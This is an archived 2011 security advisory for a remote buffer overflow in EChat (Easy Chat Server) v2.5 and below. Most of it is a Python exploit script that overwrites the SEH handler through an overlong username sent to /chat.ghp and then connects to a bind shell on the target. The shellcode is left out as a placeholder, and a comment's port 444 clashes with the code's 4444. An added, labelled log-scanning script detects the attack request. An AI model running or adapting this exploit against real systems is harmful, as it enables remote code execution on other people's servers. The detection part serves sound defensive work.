INSECT Pro - Exploit EChat Server <= v2.5 20110812 - Remote Buffer Overflow Exploit

2011-08-17T00:00:00
ID SECURITYVULNS:DOC:26856
Type securityvulns
Reporter Securityvulns
Modified 2011-08-17T00:00:00

Description

Information

Name : EChat Server <= v2.5
Software : E Chat Server
Vendor Homepage : http://www.echatserver.com/
Vulnerability Type : Remote Buffer Overflow Exploit
Severity : High
Researcher : Juan Sacco (Runlvl) <jsacco [at] insecurityresearch [dot] com>

Description

EChat Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

Exploit example as follows

#!/usr/bin/python
# Easy Chat Server <= v2.5 Remote Buffer Overflow Exploit
# Written by Juan Sacco (Runlvl)
# Contact: jsacco@insecurityresearch.com
# Web site: http://www.insecurityresearch.com
# Target tested: Windows XP SP3

import sys
import httplib
import telnetlib


def howtousage():
    print "Sorry, required arguments: Host Port"
    sys.exit(-1)


def run():
    try:
        # Basic structure: JUNK + NSEH + SEH + SHELLCODE
        Junk = '\x41' * 216          # 216 bytes of A
        nSEH = '\xEB\x06\x90\x90'    # JMP 6 bytes short
        SEH = '\xE1\xB2\x01\x10'     # 0x1001b2e1 pop edi; pop esi; ret

        # ShellCode Bind TCP PORT 444 Length 751 Encode : Alpha Upper
        ShellCode = "<shellcode omitted>"  # placeholder: the advisory's encoded bind-shell payload is not reproduced here
        ShellCodePort = 4444
        CraftedBuffer = Junk + nSEH + SEH + ShellCode
        vulnerableURL = ('/chat.ghp?username=' + CraftedBuffer +
                         '&password=null&room=1&null=2')

        # Send the oversized username parameter to the chat login handler
        Connection = httplib.HTTPConnection(Host, Port)
        Connection.request('GET', vulnerableURL)
        Connection.close()

        print "Connecting to " + Host
        TelnetConnection = telnetlib.Telnet(Host, ShellCodePort)
        TelnetConnection.interact()

    except:
        print "Exploit connection closed"


if __name__ == '__main__':
    print "Exploit EChat Server <= v2.5 Remote Buffer Overflow Exploit"
    print "Author: Juan Sacco (Runlvl)"

    try:
        Host = sys.argv[1]
        Port = int(sys.argv[2])
    except IndexError:
        howtousage()
    run()
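As an added defender-side example (not part of the advisory or its exploit code), the following check scans web-server access logs for chat.ghp login requests whose username or password parameter is far longer than any legitimate value, which is the request shape the overflow relies on. The 64-character threshold and the sample log lines are constructed assumptions.

```python
# Added example (not from the advisory): flag requests to the chat login
# handler whose query parameters are far longer than any real login value.
# The threshold and the sample log lines below are constructed assumptions.
from urllib.parse import urlsplit, parse_qsl

WATCHED_PATH = "/chat.ghp"
MAX_PARAM_LEN = 64  # assumption: no legitimate username/password is longer

def check_request_target(target, max_len=MAX_PARAM_LEN):
    """Return (param, length) pairs exceeding max_len for requests to the
    chat login handler; an empty list means nothing suspicious."""
    parts = urlsplit(target)
    if parts.path.lower() != WATCHED_PATH:
        return []
    hits = []
    # keep_blank_values so an empty parameter still counts as present
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if len(value) > max_len:
            hits.append((name, len(value)))
    return hits

def scan_access_log(lines, max_len=MAX_PARAM_LEN):
    """Scan common-log-format lines; return (index, method, hits) for each
    line whose request carries an overlong chat.ghp parameter."""
    findings = []
    for i, line in enumerate(lines):
        # the request is the quoted "METHOD target HTTP/x.y" field
        try:
            request = line.split('"')[1]
            method, target = request.split()[:2]
        except (IndexError, ValueError):
            continue  # malformed line, not this check's concern
        hits = check_request_target(target, max_len)
        if hits:
            findings.append((i, method, hits))
    return findings

# Constructed sample lines: a normal login, an overlong username, a static file.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Aug/2011:10:00:00 +0000] "GET /chat.ghp?username=alice&password=null&room=1&null=2 HTTP/1.1" 200 512',
    '10.0.0.9 - - [17/Aug/2011:10:00:03 +0000] "GET /chat.ghp?username=' + "A" * 216 + '&password=null&room=1&null=2 HTTP/1.1" 500 0',
    '10.0.0.9 - - [17/Aug/2011:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for idx, method, hits in scan_access_log(SAMPLE_LOG):
        print("line %d: %s %s" % (idx, method, hits))
```

A request that trips this check against a server that crashes afterwards (the 500 in the sample) is also the denial-of-service signature the advisory describes for failed attempts.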

Author

Juan Sacco (Runlvl) - http://www.insecurityresearch.com

--


Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released, stay tuned